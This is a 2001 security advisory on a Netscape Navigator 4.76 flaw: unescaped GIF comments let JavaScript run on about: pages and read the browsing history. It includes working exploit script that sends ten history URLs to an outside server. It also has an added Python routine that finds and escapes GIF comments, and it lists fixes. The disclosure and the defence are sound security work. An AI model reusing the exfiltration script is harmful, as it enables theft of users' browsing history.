Product: Netscape Navigator/Communicator
Tested on: 4.76 (on Linux and Win98/NT)
Vendor Contact: Reported 2001-03-22
{ Problem
}--------------------------------------------------------
Overview:
The Netscape browser does not escape the GIF file comment on the image information page. This allows JavaScript execution in the "about:" protocol and can, for example, be used to upload the history (about:global) to a web server.
Detail:
Netscape does not allow JavaScript to access documents from a different domain. This stops a script from one domain from tampering with login forms or private data belonging to another domain. The following error message is shown:
"access disallowed from scripts at <javascriptdomain> to documents at another domain."
Now there is the protocol "about:", which is used for some special tasks.
about: - shows Netscape version and copyrights
about:blank - shows a blank document
about:config - shows the browser configuration
about:global - shows information about the Netscape global history
about:<url> - shows information about the specified URL
…
There are some other about: documents (try grepping the Netscape binary).
about:global is very interesting since all visited documents are listed there. So I tried to find a way to access this information.
I created a frameset with 2 frames. The first frame (called foo) contains about:global. Using <frame src="about:global">, <meta http-equiv="refresh" content="10; URL=about:global"> or document.location.href="about:global"; for setting this URL did not work. So I used the following trick to make it work:
<base href="about:">
<form action="global" name="loadhistory">
<input type="submit">
</form>
<script language="javascript">
document.loadhistory.submit();
</script>
My intention is that the second frame (called bar) grabs 10 URLs from the first frame using JavaScript and sends them to the server. Accessing parent.frames["foo"].document.links does not work since foo is displaying an about: document and bar is a normal http document:
"access disallowed from scripts at blah to documents…"
So I tried to find a way to start a JavaScript within an about: document. about:<someurl> comes to mind since there are a lot of server-specified values.
First I tried to inject JavaScript using the URL of the script. But since this URL is encoded (space => %20 etc.) there is no way in. Modifying the Content-Type (File MIME Type) did not work either, because Netscape opens a "Save as…" window when supplying an unknown MIME type.
Then I remembered that Netscape shows the comment included in GIF files. A quick test showed that the comment is not escaped. So JavaScript in GIF comments is executed in the about: realm. This means that this script can then access the content of about:global. Nice.
The following script, included in the comment, reads 10 URLs from the about:global frame (foo), stores them in the form and finally submits this form.
<form action=http://bla/ns476history.php target=_parent name=s method=get>
<input name=u>
</form>
<script>
f=parent.frames["foo"].document;
l="";
for(i=0;i<10;i++)
l+=f.links[i]+"|";
document.s.u.value=l;
document.s.submit();
</script>
The server now has 10 URLs from about:global. Accessing about:config should be possible too, but I did not try it.
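The root cause above is a GIF Comment Extension rendered into a page without HTML escaping. The following is an added example (not from the advisory or from Netscape's code) that walks the GIF data stream, pulls out every comment block, flags comments that would turn into live markup, and shows the escaped form the information page should have rendered; the sample image is constructed here and its comment is inert.

```python
import html
import struct

def _read_subblocks(data: bytes, pos: int) -> tuple[bytes, int]:
    # Data sub-blocks: 1-byte length then payload, repeated until a 0x00 terminator.
    payload = b""
    while (size := data[pos]) != 0:
        payload += data[pos + 1:pos + 1 + size]
        pos += 1 + size
    return payload, pos + 1

def extract_comments(data: bytes) -> list[bytes]:
    # Walk the GIF data stream and return the payload of every Comment Extension (0x21 0xFE).
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF data stream")
    packed = data[10]                                  # logical screen descriptor flags
    pos = 13 + (3 * (2 << (packed & 7)) if packed & 0x80 else 0)  # skip global colour table
    comments = []
    while pos < len(data) and data[pos] != 0x3B:      # 0x3B = trailer
        if data[pos] == 0x21:                          # extension: label, then sub-blocks
            label = data[pos + 1]
            payload, pos = _read_subblocks(data, pos + 2)
            if label == 0xFE:
                comments.append(payload)
        elif data[pos] == 0x2C:                        # image descriptor (9 bytes after introducer)
            lpacked = data[pos + 9]
            pos += 10 + (3 * (2 << (lpacked & 7)) if lpacked & 0x80 else 0)
            _, pos = _read_subblocks(data, pos + 1)    # +1 skips the LZW minimum code size
        else:
            raise ValueError(f"unexpected block 0x{data[pos]:02x} at offset {pos}")
    return comments

def comment_has_markup(comment: bytes) -> bool:
    # A comment carrying HTML metacharacters becomes live markup if inlined unescaped.
    return any(ch in comment for ch in (b"<", b">", b"&"))

def safe_comment(comment: bytes) -> str:
    # What the image information page should render: the comment with metacharacters escaped.
    return html.escape(comment.decode("latin-1"))

# Constructed 1x1 GIF89a whose comment holds inert markup (test data built here, not the
# advisory's image): header, 2-entry global colour table, comment, image descriptor, pixel data.
COMMENT = b"<script>x()</script> & <b>bold</b>"
SAMPLE_GIF = (
    b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0x80, 0, 0) + b"\x00\x00\x00\xff\xff\xff"
    + b"\x21\xfe" + bytes([len(COMMENT)]) + COMMENT + b"\x00"
    + b"\x2c" + struct.pack("<HHHHB", 0, 0, 1, 1, 0) + b"\x02\x02\x44\x01\x00"
    + b"\x3b"
)

if __name__ == "__main__":
    for c in extract_comments(SAMPLE_GIF):
        print("markup" if comment_has_markup(c) else "plain", "->", safe_comment(c))
```

The same walk can be run over uploaded images to reject or strip comment blocks before they reach any viewer that renders metadata.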
{ Solution
}--------------------------------------------------------
Disable Javascript
or
Upgrade to 4.77
{ Exploit
}---------------------------------------------------------
attached
or
http://dividuum.de/security/netscape/
Regards,
Florian Wesch <[email protected]>
http://dividuum.de